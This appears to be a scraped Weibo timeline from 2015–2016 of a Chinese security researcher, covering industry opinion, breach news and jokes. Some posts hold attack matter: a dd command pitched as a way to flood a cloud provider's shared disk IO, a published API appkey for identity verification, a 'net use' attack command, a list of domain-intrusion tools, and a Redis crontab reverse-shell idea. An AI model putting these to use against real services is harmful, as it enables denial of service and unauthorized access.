云计算中的弹性计算,按时付费机制,会导致攻击成本的骤降,最终自食其苦。比如我是一个普通的租户,在云计算提供商那里的一个固定区域申请1000个硬盘实例,然后在每个实例上 dd if=/dev/zero of=test bs=64k count=4k oflag=dsync ,把IO打满,然后风暴就来了。
ringzero
2016-11-20 来自 微博 weibo.com
我吃肉才有力气干活,然后你说吃糠便宜,云计算市场的乱象。
ringzero
2016-11-19 来自 微博 weibo.com
「威胁情报,态势感知」都只是「数据积累+安全能力」的一种落地形式,如果你发现有人在谈论这两个话题的时候,没有附上数据和实质性的安全能力描述,那就要小心了,这可能是在睁眼说瞎话。还有就是,国内很多公司把自己的扫描器说得天花乱坠,却从来不提技术策略,实现细节,那么你也得小心了。
ringzero
2016-11-18 来自 微博 weibo.com
美元兑人民币中间价6.8796元,特斯拉说因为汇率要提价了,我好担心MacBook Pro现在不下手的话,会不会也跟着涨价。
ringzero
2016-11-17 来自 微博 weibo.com
系统不开放就不会有安全威胁,
业务不发展就不会有运维事故,
部队不训练就不会有伤亡损失。
业务不发展就不会有运维事故,
部队不训练就不会有伤亡损失。
ringzero
2016-11-16 来自 微博 weibo.com
那些说查询要收费的,成本高的,你们的思维太僵化了,而且还喜欢第一时间否定别人说的。appkey=bbefe459287faab66731a970d9c85328 ,还有很多提供实名认证「银行、证券、征信、智能生活」的接口,并没有你想象的安全,他们指望验证码限制重复请求,却不知道机器脚本早就可以做到95%的正确识别率了。
ringzero
2016-11-15 来自 微博 weibo.com
Facebook为了检查用户是否使用了同样的密码,Facebook公司从黑市购买用户信息,然后用网站上使用的加密密码与其做交叉检查。那么请问,国内是否也可以这样做?是否违法?
ringzero
2016-11-10 来自 微博 weibo.com
记录系统调用&用户登录成功的日志,可以发现大多数的Windows域渗透行为,常用套路就是执行那几个命令:sc.exe、systeminfo、powershell、ipconfig.exe、schtasks.exe、netstat.exe、netsh.exe、net.exe、psexec.exe、tasklist.exe、wmic、mimikatz、msf套件,以及释放出来的临时文件。
ringzero
2016-11-08 来自 微博 weibo.com
信息安全这个行业,不怎么作为的企业,最大的红利是「政策红利」。而有所作为的企业,他们面对的最大的风险,恰恰却是「政策风险」。
ringzero
2016-11-06 来自 微博 weibo.com
暴雪将开放分享《星际争霸2》的AI技术,供全世界科学家共同研究开发。而在未来,谷歌DeepMind将针对游戏《星际争霸2》开发新的人工智能。
ringzero
2016-11-05 来自 微博 weibo.com
前端框架Semantic-UI 对比 Bootstrap,简直就是高富帅vs屌丝。
ringzero
2016-10-27 来自 微博 weibo.com
花了那么多的钱请的一群什么狗屁安全专家。
长图 
ringzero
2016-10-25 来自 微博 weibo.com
前有DirtyCOW打崩所有Linux, 后有Mirai & BotNet打崩了半个美国互联网,今天又来了个能够打崩所有Android的Drammer漏洞,隔三差五的刺激人,这样可不行,明天还是得买点「安全股票」压压惊。
ringzero
2016-10-21 来自 微博 weibo.com
Get ALL URLSchemes
@StackOverflowError:
经常被问某些 app 的 URL Scheme 是什么,写了个 app 来解决这个问题:网页链接 可以在非越狱设备上面获取所有 app 的 Plist 文件,可以查看、复制、以及分享出去。点击 CFBundleURLTypes 可以查看 URL Schemes。本项目全部使用私有 API,需要编译安装到手机上。
网页链接 可以在非越狱设备上面获取所有 app 的 Plist 文件,可以查看、复制、以及分享出去。点击 CFBundleURLTypes 可以查看 URL Schemes。本项目全部使用私有 API,需要编译安装到手机上。 
ringzero
2016-10-19 来自 微博 weibo.com
今天把Worker Pools加了个功能,插件在发起网络并发请求之前,先模拟得出一个合理的阈值,再限制并发数小于阈值。两个蠢方法,看错误结果集中是否有`connection reset by peer`等等信息,或者统计Timeout的数量。
ringzero
2016-10-19 来自 微博 weibo.com
利益斗争双方,借黑客之手披露见不得人的信息,黑客被当枪使。
@西城SQL:
今年#美国大选# 中主流媒体扮演的角色很肮脏。要真相得去求助于黑客,而媒体千方百计地去掩盖真相。![[思考]](./wy_files/d_sikao-7f3b022e72.png)
![[黑线]](./wy_files/d_heixian-4cbb6a297e.png)
American·Washington King
,而媒体千方百计地去掩盖真相。 American·Washington King 
ringzero
2016-10-10 来自 微博 weibo.com
昨天看你们那么多人发朋友圈说习大大在《新闻联播》节目里面,喊了很多增强网络空间安全防御能力的口号,我就应该买一买信息安全股的。今天启明星辰积极响应了号召,率先涨停。
ringzero
2016-10-09 来自 微博 weibo.com
用Go实现一个协程异步的Socks5服务,本地各种稳定快速,一部署到远程水管VPS上,各种DELAY和FAILED,Chrome & Proxy Switchy默认开启远程DNS解析,这个是最耗时和不稳定的,只能加个Dnsmasq缓存缓解。在爬虫和扫描器的httpClient那块,DNS解析也是造成性能缓慢的通病。
ringzero
2016-10-07 来自 微博 weibo.com
商标注册流程:商标查询(2天内)→申请文件准备(3天内)→提交申请(2天内)→缴纳商标注册费用→商标形式审查(1个月)→下发商标受理通知书→商标实质审查(12个月)→商标公告(3个月)→颁发商标证书。(2014.05.01实施新的商标法,商标实质审查期9个月。)
ringzero
2016-10-05 来自 微博 weibo.com
市面上现在有带COMMAND键的机械键盘吗?
ringzero
2016-09-25 来自 微博 weibo.com
对抗机器爬虫的一种办法,浏览器客户端发起的HTTP请求,Headers的顺序是有讲究的。而很多爬虫在定义Headers的时候,使用的变量vector都是无序随机的。
ringzero
2016-09-25 来自 微博 weibo.com
MYSQL 中 utf8_unicode_ci 和 utf8_general_ci 两种编码格式, utf8_general_ci不区分大小写, Ä = A, Ö = O, Ü = U 这三种条件都成立, 对于utf8_general_ci下面的等式成立:ß = s ,但是,对于utf8_unicode_ci下面等式才成立:ß = ss 。
ringzero
2016-09-23 来自 手机微博触屏版
Yahoo!今天确认5亿用户信息遭黑客攻击泄露,信息包含 : 用户名,姓名,生日,联系电话,加密过的密码,安全问题和答案(部分未加密)。
ringzero
2016-09-23 来自 手机微博触屏版
Yahoo confirmed 500 million users info leaked —The account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (the vast majority with bcrypt) and, in some cases, encrypted or unencrypted security questions and answers.
ringzero
2016-09-18 来自 微博 weibo.com
自从Python、Go等脚本兴起后,Linux那块一些老的生态链出现了断层,比如说:2006年、2010年的几个C项目,使用了开源库libevent,随着CentOS的发展,内核更新&安全更新带动了一些开源库(openssl,libevent,lippcap)做出了大改动,没人维护的项目尴尬的死掉了,但是用脚本重写C项目,又总感觉不踏实。
ringzero
2016-09-14 来自 微博 weibo.com
写脚本有个尴尬的地方,完成代码功能往往不费时,但是写个README,却要花费两倍或者更多的时间。
ringzero
2016-09-14 来自 微博 weibo.com
阿里程序员 :
我的程序再也不会有BUG了,因为领导会把找BUG的人开除掉。
其它程序员 :
我的程序再也不会有漏洞了,因为领导会把找漏洞的人抓起来。
我的程序再也不会有BUG了,因为领导会把找BUG的人开除掉。
其它程序员 :
我的程序再也不会有漏洞了,因为领导会把找漏洞的人抓起来。
ringzero
2016-09-13 来自 微博 weibo.com
做安全的人,对于系统的缺陷,都有着高度的敏感性,在没有规则约束的情况下,给你一个抢东西的机会,你要是抢不到,是会被同行笑话的。但是,换在「政治正确、价值观正确」第一的环境下,在你心里萌发出「技术挑战」「突破限制」这个想法的时候,就已经在犯错了。
ringzero
2016-09-08 来自 微博 weibo.com
iPhone7硬件设计:小尺寸接口胜于大尺寸接口,通用接口胜于单一功能接口,高速接口胜于低速接口,数字接口胜于模拟接口,防水接口胜于不防水接口,可盲插接口胜于不对称接口。
ringzero
2016-09-05 来自 微博 weibo.com
可能若干年后,还会记得那些个日子的欢呼声,感叹声,
黑客竞赛,并不是开始,也不是结束,
只是在一段最醉人的时光里,遇见一群让你很难忘记的逗逼而已,
「爱屋及乌」,可能和这群逗逼在一起奋斗的回忆,也被你,在不知不觉之中,
刻进了你的灵魂之中。
黑客竞赛,并不是开始,也不是结束,
只是在一段最醉人的时光里,遇见一群让你很难忘记的逗逼而已,
「爱屋及乌」,可能和这群逗逼在一起奋斗的回忆,也被你,在不知不觉之中,
刻进了你的灵魂之中。
ringzero
2016-08-23 来自 微博 weibo.com
单一无关联的数据泄露不可怕,最可怕的事情是你在不同地方的数据被汇总到一起,并且用于计算,也就是被「人物画像」。这将计算出整个人的生活轨迹,到这种状况才是毫无隐私可言。现在连买个手机卡、住个酒店、去网吧上网都需要身份证,将来出现这种情况将毫不惊奇。
ringzero
2016-07-13 来自 微博 weibo.com
最好的攻击算法能最大化防守能力。
ringzero
2016-06-27 来自 微博 weibo.com
乌云模式下,企业一直都拥有拒绝的权利,他们为什么不提出抗议?对于白帽子提交的漏洞,直接点“忽略漏洞”,然后在厂商回复那里留下:“不要测试我,谁测试我,我就报警了”。就像你到商店买东西,内设监控警示语一样。
ringzero
2016-06-25 来自 微博 weibo.com
善源起于心,但人心难测。--路人甲
@tombkeeper:
有人向乌云提交某网站的 SQL 注入漏洞,测试中抓了 4000 条用户信息,然后厂商就找公安把人抓了。可能很多人不知道:按《刑法》285 条第 2 款及相关司法解释,入侵获取金融证券系统身份认证信息 10 条以上、一般系统 500 条以上,就可以判刑。以后开安全会议,可以考虑找个熟悉相关法律的律师普普法。
ringzero
2016-06-24 来自 微博 weibo.com
平均每天5个骚扰电话,泄露用户手机号的那些互联网公司,如果你们无法保障信息系统的安全,就不要强制我填手机号啊。
ringzero
2016-06-20 来自 微博 weibo.com
很多WEB中间件的容器都是Windows,比如weblogic,JBoss,而weblogic天生就存在一个SSRF漏洞,不仅可以用于SMBRelay,现在某些场景又多了一条BadTunnel的路子。
@tombkeeper:
BadTunnel 攻击的一个有趣之处:如果有人试图调用系统的 NetBIOS 相关函数来扫描别人的 NBNS 信息,或者试图类似这样 net use \\8.8.8.8\$IPC /user:administrator password 来攻击别人,反而会让自己可能受到 BadTunnel 攻击。这正是:以彼之(隧)道,还施彼身。
ringzero
2016-06-03 来自 手机微博触屏版
搭车学习数据分析。![[微笑]](./wy_files/d_hehe-4f9f713058.png)
@phunter_lau:
感谢乌云白帽大会盛情邀请,我会在大会上分享我们组的一些微小的工作,从DNS数据上自动抓恶意软件的C&C切入讲讲安全数据的自动智能机器分析。大家说visibility看见的能力就是异常检测就是pewpewpew,而我们认为visibility还应该包括之后的自动化聚类分类和特征分析。网页链接 @乌云知识库
网页链接 @乌云知识库 
ringzero
2016-05-31 来自 微博 weibo.com
微型高压脉冲发生器,USB一接入,瞬间放电,毁灭机器。![[泪]](./wy_files/d_lei-316a1a3ed5.png)
还真有这玩意!
还真有这玩意! 
![[拜拜]](./wy_files/d_baibai-fdd5eeb1d1.png)
ringzero
2016-05-19 来自 微博 weibo.com
不管是国内,还是国外的传统安全厂商,都保留着一些传统的坏习惯,比如,都喜欢开一个匿名的ftp服务,让购买了产品的客户来远程更新补丁,然后骇客就能直接解压补丁,接触到产品源码了。可以说,那些安全公司的产品,只要出了带WEB服务功能的,都是渣。
ringzero
2016-05-09 来自 微博 weibo.com
开启HackerOne打怪升级之路,国内的鱼塘太脏,一言不合就下网,真不适合遨游。改变不了这个环境,就只能远离它,如果你的目标足够有野心,新的环境足够疯狂,即使混得不怎样,失败了也能有相当不错的成就。
ringzero
2016-05-05 来自 微博 weibo.com
行业封闭确实能够掩盖很多问题,等到有天遮羞布被拿开(行业透明),撒的谎吹的牛就都掩饰不住了。“未授权等于网络犯罪、国产自主可控才能保证主权安全”是一滩潮水,潮水退了,才知道谁在裸泳。裸泳的人,当然会觉得这潮水是如此重要。
ringzero
2016-04-29 来自 微博 weibo.com
国内很多python培训班的课程,在讲Socket编程的时候,老师全都喜欢用pickle序列化好数据后,再传给Socket Server来读,这样学员们依葫芦画瓢写出来的服务端就很尴尬了。
ringzero
2016-04-23 来自 微博 weibo.com
赞同尺度观点,窃取、篡改、删除企业的数据,对业务运行造成影响肯定是违法的。我想大多数人的初心是希望协助企业与行业来解决实际存在的安全问题,让互联网更健康安全,让安全从业者被重视和能力有所发挥吧。 //@yuange1975: 如果只是简单的访问肯定不违法,但是超过尺度就是违法。
@ringzero:
你使用了盗版的操作系统,跑了使用 GNU 开源协议的中间件,用着开源的语言写了个网站,还私自架设了未备案的服务器,我访问了你一下,你说我违法了。
ringzero
2016-04-22 来自 微博 weibo.com
没有乌云很难想象今天国内的网络安全环境会是啥样子 我看见很多年轻人以加入乌云为荣 也看见乌云对这些年轻人起到了正向的引导作用 其善大焉 希望圈里朋友不要因为一条新闻就简单对白帽子做有罪推定。@bricolear
ringzero
2016-04-22 来自 微博 weibo.com
你使用了盗版的操作系统,跑了使用 GNU 开源协议的中间件,用着开源的语言写了个网站,还私自架设了未备案的服务器,我访问了你一下,你说我违法了。
ringzero
2016-04-21 来自 微博 weibo.com
手上没神器,怎能做到一出场就赢呢?
ringzero
2016-04-19 来自 微博 weibo.com
大多数人由于知识(纯粹的智商)贫乏,导致几乎没有了独立思考的能力,所以他们特别担心人工智能拥有独立思想。因为人工智能有个最大的特点就是理性,不会和人讲人情味!!!
ringzero
2016-04-18 来自 微博 weibo.com
还好注释了,不然就是一个远程命令执行
ringzero
2016-04-13 来自 微博 weibo.com
上海有一个著名的“官二代”,跟着徐翔一起炒股票,重仓买入美特斯邦威后被套牢了。这个【官二代】向徐翔抱怨,于是徐翔立刻打了个电话给【中信证券】的操盘手,这个操盘手就在7 月8 日之后重仓买入了美特斯邦威15% 的股份,而美特斯邦威并未作出公告。
ringzero
2016-04-07 来自 微博 weibo.com
转发微博
@乌云-漏洞报告平台:
每日收入过万是怎么做到的… 乌云君深度揭秘伪基站短信诈骗这个完整的利益链,其中的详细的分工、运作模式与收入令人发指! 深度揭秘:伪基站短信诈骗产业传奇始末!
深度揭秘:伪基站短信诈骗产业传奇始末! 乌云-漏洞报告平台
深度揭秘:伪基站短信诈骗产业传奇始末!
ringzero
2016-04-05 来自 微博 weibo.com
微博上有人说,贵国信息安全从业者的薪酬会水涨船高, 傻子们还是不要跟着起哄得好,再怎么涨也和你无关。参考:http://t.cn/RqUc80g
该微博因被多人举报,根据《微博社区管理规定》,已被删除。查看帮助:http://t.cn/Rfd14WY
ringzero
2016-04-01 来自 微博 weibo.com
借鲁迅《聪明人和傻子和奴才》,隐喻那些曾经给信息安全行业砸过墙的傻子们
长图 
ringzero
2016-03-22 来自 微博 weibo.com
学习内容平均留存率最高的是:实践 && 传授他人。
ringzero
2016-03-20 来自 微博 weibo.com
最近感觉心脏负荷有点重,开始把每天喝的V超大杯美式咖啡换成了G大杯美式咖啡,外加兑两份脱脂牛奶,30以后,成熟男人开始懂得爱惜自己的身体。
ringzero
2016-03-16 来自 微博 weibo.com
中概回A股借壳,被黑客入侵窃听,得知内幕后带着穷苦兄弟们劫了BAT大佬们的胡,触动了大佬的利益,大佬不惜重金派出杀手追杀,黑客亡命天涯の苟富贵勿相忘的故事。
ringzero
2016-03-10 来自 微博 weibo.com
最近在疯狂的寻找改善生活的利器(最好带可编程控制器),童鞋们有啥推荐的吗?下面是近期入手了两个小东西:手压切丝机,inokim QUICK 2 电动滑板车,购买链接见评论。
ringzero
2016-03-03 来自 微博 weibo.com
超过 90 秒的任务 & 重复两次以上的任务,不自动化,你好意思说自己是黑客?
ringzero
2016-03-01 来自 微博 weibo.com
弗洛伊德认为当个体所受到的刺激超过了本身控制和释放能量的界限时,个体就会产生不安全感。比如房价上涨、股市暴跌……
ringzero
2016-02-29 来自 微博 weibo.com
二、三、四线城市劫持的比较惨,一线城市相对来讲没那么猖狂。
@乌云-漏洞报告平台:
今天,你被运营商 “上” 了么?如今这年头,没被运营商“上”过(劫持)都不好意思说自己是中国网民!白帽子通过一个案例来解读最近很常见的手机安装包恶意替换案例,发现这运营商劫持这勾当已经非常成熟了。 今天,你被运营商 “上” 了么?
今天,你被运营商 “上” 了么? 乌云-漏洞报告平台
今天,你被运营商 “上” 了么?
ringzero
2016-02-26 来自 微博 weibo.com
工程师的主要目的是改变世界,科学家是解释世界。
ringzero
2016-02-19 来自 微博 weibo.com
能量守恒定律,这么多iPhone手机用户,玻尔兹曼常数放大,会使地球温度上升,间接导致海平面上升,北极熊宝宝无家可归。
@手机iPhone频道:
【iPhone 7重磅功能曝光:远程无线充电!】据Energous透露苹果已经在iPhone上测试无线充电了,如果一切顺利,iPhone 7上可能会出现基于Energous的无线充电方案,它酷的地方在于,只要设备在4.5米以内,都可以进行充电,简而言之就是不用接触。Energous对外表示,这项新技术将在2016年或2017年商业化。
![[猪头]](./wy_files/d_zhutou-be36461c73.png)
![[哆啦A梦吃惊]](./wy_files/dr_chijing-709027feca.png)
![[哈哈]](./wy_files/d_haha-bdd6ceb619.png)
ringzero
2016-01-17 来自 微博 weibo.com
蝙蝠侠悖论:蝙蝠侠想把一切都交给法律,然而哥谭市警察局却对大量的犯罪有心无力且毫无作为。
ringzero
2016-01-02 来自 微博 weibo.com
在21比35的劣势情况下,鱼塘首领打出了一句:“你们一点求胜的欲望都没有,搞得我都不想继续打了”,小鱼听后,激昂地留下了眼泪,心想难道这就是业余和职业的差别?鱼塘首领又补充一句:“电子竞技的世界不相信眼泪,只信实力!”,遇上这么一个爱讲道理的鱼塘首领,小鱼们真是哭也不是,不哭也不是。
ringzero
2016-01-01 来自 微博 weibo.com
如果你有两个选择:坐在家里看电视,还是跑步,那就跑步吧!-- 昨晚跑了一个小时,从2015(GMT+8)跑到了2016(GMT+8),运动后太兴奋,结果硬是失眠了,所以前面那句话告诉我们,要科学,不要任性。
ringzero
2015-12-22 来自 微博 weibo.com
《荀子-劝学》里有一个比喻,"鼹鼠五能,不如墨鱼一技",鼹鼠是一种小飞鼠,有点像松鼠,它能飞,却飞不上屋顶;能攀,却爬不上树梢;能游,却度不过小水沟;能跑,却赶不上人走;能藏,却盖不住身体。它有五种技能,却没有一样拿得出手,很悲哀。--北向鼹鼠南向墨鱼
ringzero
2015-12-21 来自 微博 weibo.com
有的时候,面对攻击,你根本不需要出手,只要退一步(关服务),就能绝处逢生了。--Juniper ScreenOS
ringzero
2015-12-10 来自 微博 weibo.com
一项研究发现,高颜值男性在职场中升职的难度较大,因为同事们不愿意提升比自己帅气的男人。(中国日报网12月9日引用英国《每日电讯报》报道)
ringzero
2015-12-07 来自 微博 weibo.com
现在还有人在用固话吗?除了那些搞诈骗的、电话广告营销的。
ringzero
2015-12-02 来自 微博 weibo.com
接下来,唐朝安全巡航会更名为「唐朝云安全」,将带着强烈的「安全数据运营」愿景登场,本次发布的tangscan 3.0产品,不再是一个扫描器,不再是扫描器,不单是扫描器。
@唐朝云安全:
#唐朝安全巡航来袭#从去年提出自动化攻击的想法开始,到现在唐朝安全巡航正式与所有期待它的人见面,是整整【461】天的努力和付出。这一刻我们都等了太久,这一刻我想要分享给你!#12月16日,798秀剧场,唐朝安全巡航发布会,不见不散#活动报名链接:网页链接
网页链接 
ringzero
2015-11-29 来自 微博 weibo.com
我有位家境一般的朋友,一直觉得如果自己有钱一定会更幸福。后来他爸做信息安全教育发财了。快十年后我见他,问:现在你倒是有钱了,你真的幸福吗?他回答:爽翻啦!我默默地走开了。
ringzero
2015-11-19 来自 微博 weibo.com
漏洞的修复程度 + 响应速度 = 利用技术公开普及率 + 利用通用程度 + 工具傻瓜程度
ringzero
2015-11-11 来自 微博 weibo.com
读了下redis的官方文档,可以不用反弹,不用正向连接(ssh服务),就能实现一个带回显的远程命令执行exp,明天起床写好了发乌云知识库
ringzero
2015-11-11 来自 微博 weibo.com
写crontab反弹shell不是更好吗?毕竟22端口对外开放的少 //@乌云-漏洞报告平台: 这个远程登录服务指的不是登录redis,而是redis所在服务器的SSH服务(远程管理),成功利用后就可以远程在服务器上执行命令操作。
@乌云-漏洞报告平台:
redis是一款基于内存与硬盘的高性能数据库,在国内外被大型互联网企业、机构等广泛采用。但在国内企业对redis服务的安全配置不是很规范,导致存在远程登录服务器甚至提权操作的风险,目前乌云已经接到国内漏洞案例,请企业近期密切关注! 网页链接
网页链接 长图 
![[阴险]](./wy_files/d_yinxian-b3257f06bb.png)
ringzero
2015-11-09 来自 微博 weibo.com
挑战发布不到一小时,就被人成功的干掉,哪位英雄干的啊? 网页链接
网页链接
@ringzero:
我在三个白帽发起来了一个针对1024社区(phpwind5.3)的技术挑战 三个白帽-成为1024最有钱的男人 -- WooYun(白帽子技术社区) -- 网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地又一个有意思的地方
三个白帽-成为1024最有钱的男人 -- WooYun(白帽子技术社区) -- 网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地又一个有意思的地方 ringzero
2015-11-09 来自 微博 weibo.com
我在三个白帽发起来了一个针对1024社区(phpwind5.3)的技术挑战 三个白帽-成为1024最有钱的男人 -- WooYun(白帽子技术社区) -- 网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地又一个有意思的地方
三个白帽-成为1024最有钱的男人 -- WooYun(白帽子技术社区) -- 网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地又一个有意思的地方 
ringzero
2015-11-09 来自 微博 weibo.com
地铁上发现站我对面的一个女孩牛仔裤拉链没拉,我该怎么提醒她?
ringzero
2015-11-07 来自 微博 weibo.com
你们这群年轻人,就等着出来个大事情,可以闹一闹。现在的风气离黑社会不远了,一堆人不讨论怎么解决安全问题,改善网络安全环境,尽想着人家要是不给你解封,你就要威逼脱掉人家的裤子。中央说:“和谐社会是不准开玩笑的”,人家封你号,是因为你的(just for fun)影响到了其它人。
ringzero
2015-11-07 来自 微博 weibo.com
transmit 转发,comment 评论,follow 关注,后面是一整套的weibo sdk,还能发私信,读你的用户信息(登录手机、邮箱之类);
@tombkeeper:
昨晚大家玩的那个微博 CSRF,不光能发新微博,还能转发,能评论,能加关注。如果写成转发原微博的,或者嵌套的,就变成蠕虫了。最有趣的是这个问题 2011 年就有人发现了,不过那位同志可能是搞前端开发的,把这当一个功能去用了,没意识到是安全问题:网页链接 ![[偷笑]](./wy_files/d_touxiao-3458a765a2.png)
网页链接 ringzero
2015-11-06 来自 微博 weibo.com
把写扫描器用的测试环境拼凑打个包,锚几个命中规则,就是一个蜜罐系统了,一定要有整理、记录、分类的好习惯。
ringzero
2015-11-06 来自 微博 weibo.com
那些年:腾讯QQ群信息被黑产利用,微信首先发现xcode被感染,自己偷偷摸摸的把问题补了不吭声。还有很多公司被脱裤,打死不肯承认被脱库只肯说是被撞库。国内企业的通用甩锅公关流程都能背出来:实时数据 => 非实时数据 => 日志数据 => 少量数据 => 影响有限 => 没事了。
@ringzero:
国外的威胁情报联盟大致可以理解为,当自己家里的俊姑娘被人强XO了,作为联盟成员,你得将自己家姑娘被怎么强XO的所有细节讲给其它联盟成员听;国内企业“厚脸皮”全球知名(更别说自己家的丑事),他们成立威胁情报联盟,加入各种群,就是想看看别人家的姑娘怎么被XO的,共享自己家的事儿,门儿都没。
ringzero
2015-11-06 来自 微博 weibo.com
国外的威胁情报联盟大致可以理解为,当自己家里的俊姑娘被人强XO了,作为联盟成员,你得将自己家姑娘被怎么强XO的所有细节讲给其它联盟成员听;国内企业“厚脸皮”全球知名(更别说自己家的丑事),他们成立威胁情报联盟,加入各种群,就是想看看别人家的姑娘怎么被XO的,共享自己家的事儿,门儿都没。
ringzero
2015-11-05 来自 微博 weibo.com
在1024里看到自己女朋友的几率有多大?做成一个数据分析挑战会不会有点意思?
ringzero
2015-11-05 来自 微博 weibo.com
1024泄露的IP信息,几乎覆盖了国人翻墙的全部通道,要是被寡妇网拿到就……
ringzero
2015-10-31 来自 微博 weibo.com
微信的公众平台倒是也可以这样玩,开发接口挺丰富的。I //@响马: 会说中文吗?
@ringzero:
Hubot,由Github开发、开源的聊天机器人,很多创业公司都用Hubot来做运维自动化(比如部署代码、重启机器)、以及各种有用的没用的自动化(比如问今天的晚餐吃啥,今天无聊了扫描几个漏洞到乌云玩一玩?)。官网:网页链接 各种有趣的脚本:github/hubot-scripts · GitHub
网页链接 各种有趣的脚本:github/hubot-scripts · GitHub 
ringzero
2015-10-31 来自 微博 weibo.com
Hubot,由Github开发、开源的聊天机器人,很多创业公司都用Hubot来做运维自动化(比如部署代码、重启机器)、以及各种有用的没用的自动化(比如问今天的晚餐吃啥,今天无聊了扫描几个漏洞到乌云玩一玩?)。官网:网页链接 各种有趣的脚本:github/hubot-scripts · GitHub
网页链接 各种有趣的脚本:github/hubot-scripts · GitHub 
ringzero
2015-10-28 来自 微博 weibo.com
整天盯着国内的公司是没出息的,要训练出和国际巨头争高下的胆略和能力。
ringzero
2015-10-26 来自 微博 weibo.com
相较于现实生活中的害羞腼腆,小浩更加习惯隐藏于网络中。隔着千千万万条网线,电脑这一端坐着的是14岁的少年。和千千万万个电脑爱好者相同,小浩喜欢游戏,习惯浏览网页,和朋友用QQ聊天。和千千万万个电脑爱好者不同,小浩习惯于入侵网站,自学了Java和易语言,在350个黑客群中游刃有余。
![[浮云]](./wy_files/w_fuyun-eafe0ef555.png)
ringzero
2015-10-19 来自 微博 weibo.com
通过乌云官方微博给出的信息,在google上搜索到一份样本,与互联网已泄露的12亿条公开数据进行关联性匹配分析,发现这批样本数据与已泄露的数据交叉耦合度非常低,按照黑产市场的话说:“价值很高”!,可以确定的一件事:“又有新的拥有大体量用户群体的公司被脱裤了!!!”
@乌云-漏洞报告平台:
#泄密预警# 今日乌云漏洞报告平台接到了一起惊人的数据泄密报告!有白帽子报告称网易的用户数据库疑似泄露,影响数量总共数亿条,泄露信息包括用户名、MD5密码、密码提示问题/答案(hash)、注册IP、生日等。网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) 网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) | WooYun-2015-147763 | WooYun.org
网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) | WooYun-2015-147763 | WooYun.org 长图 
ringzero
2015-10-19 来自 微博 weibo.com
路人甲提交的泄露情报显示只是过亿,所以我们并不能断定网易是否真的被脱裤。从另外这个漏洞可以得知网易的活跃用户大于2.2亿:本报告披露内容如下:
由于网易某服务配置不当,导致所有网易用户的敏感信息将遭受泄露风险,泄露的内容包括(用户邮箱名、用户最后活跃时间、用户IP地址、用户所处位置(精确至地级市)、用户喜好(看什么样的新闻,八卦、女性、体育或者股票)、用户访问习惯、用户使用的什么浏览器、浏览器版本、使用的什么操作系统、操作版本、系统语言信息、屏幕分辨率等等信息)。
由于没有一个通用的防御规则来保护好中间件配置信息、DNS信息、业务数据信息、用户信息、源码备份文件、版本管理工具信息、系统错误信息、日志信息和敏感地址信息(后台或测试地址)的泄露,攻击者可能会通过收集这些保护不足的数据,利用这些信息对系统或用户实施进一步的攻击。|WooYun是一个位于厂商和安全研究者之间的漏洞报告平台,注重尊重,进步,与意义
本报告披露内容如下:由于网易某服务配置不当,导致所有网易用户的敏感信息将遭受泄露风险,泄露的内容包括(用户邮箱名、用户最后活跃时间、用户IP地址、用户所处位置(精确至地级市)、用户喜好(看什么样的新闻,八卦、女性、体育或者股票)、用户访问习惯、用户使用的什么浏览器、浏览器版本、使用的什么操作系统、操作版本、系统语言信息、屏幕分辨率等等信息)。
由于没有一个通用的防御规则来保护好中间件配置信息、DNS信息、业务数据信息、用户信息、源码备份文件、版本管理工具信息、系统错误信息、日志信息和敏感地址信息(后台或测试地址)的泄露,攻击者可能会通过收集这些保护不足的数据,利用这些信息对系统或用户实施进一步的攻击。|WooYun是一个位于厂商和安全研究者之间的漏洞报告平台,注重尊重,进步,与意义
@ringzero:
网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等),163数据过亿交易证明数据/包含邮箱密码密保信息/登陆ip以及用户生日等,其中密码密保均为MD5存储,解开后测试大部分邮箱依旧还可登陆。网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) | WooYun-2015-147763 | WooYun.org
网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) | WooYun-2015-147763 | WooYun.org ringzero
2015-10-19 来自 微博 weibo.com
网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等),163数据过亿交易证明数据/包含邮箱密码密保信息/登陆ip以及用户生日等,其中密码密保均为MD5存储,解开后测试大部分邮箱依旧还可登陆。网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) | WooYun-2015-147763 | WooYun.org
网易163/126邮箱过亿数据泄漏(涉及邮箱账号/密码/用户密保等) | WooYun-2015-147763 | WooYun.org ringzero
2015-10-11 来自 微博 weibo.com
高端型完全体预定价格5800(包含电机电路 零基础教程)![[哼]](./wy_files/d_heng-5670fca4fa.png)
,还不是金属版。
,还不是金属版。
@AiFrame:
矩阵动力 AIF441变革者 你的第一台智能格斗机器人 宣传pv 结构运动测试版aiframe矩阵动力 AIF 441变革者宣传PV1 转发并关注@aiframe 即可参与官方T恤抽奖活动
aiframe矩阵动力 AIF 441变革者宣传PV1 转发并关注@aiframe 即可参与官方T恤抽奖活动 
ringzero
2015-09-25 来自 微博 weibo.com
在中国,国际驾照可直接换大陆驾照,由于各国之间存在制度差异,导致菲律宾出现了一个奇怪的驾照业务。他们先帮大陆游客伪造一个假的大陆驾照(制作成本低廉,当地交管部门要验证资料,得中国领事馆协助),然后帮你转换成当地的菲律宾驾照,大陆游客回国后,即可用货真价实的菲律宾驾照换取大陆驾照。
ringzero
2015-08-27 来自 微博 weibo.com
如何成为一名黑客?沿着这样一条道路,寻找大师,跟随大师,与大师同行,洞察大师,成为大师。如何成为一名黑客? - 博客 - 伯乐在线
如何成为一名黑客? - 博客 - 伯乐在线 ringzero
2015-07-28 来自 微博 weibo.com
安全测试挑战:精细化的fuzz规则(数据分析)数据分析挑战:精细化的fuzz规则 -- WooYun(白帽子技术社区) -- 网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地又一个有意思的地方 ,实现10台机器分布式统计分析,而且你的程序应该能平滑扩展到更多的机器,支持更大的数据量。 将挑战结果私信我,你将能够参与到Tangscan(唐朝安全巡航)的研发,目前团队已获得红杉资本投资。
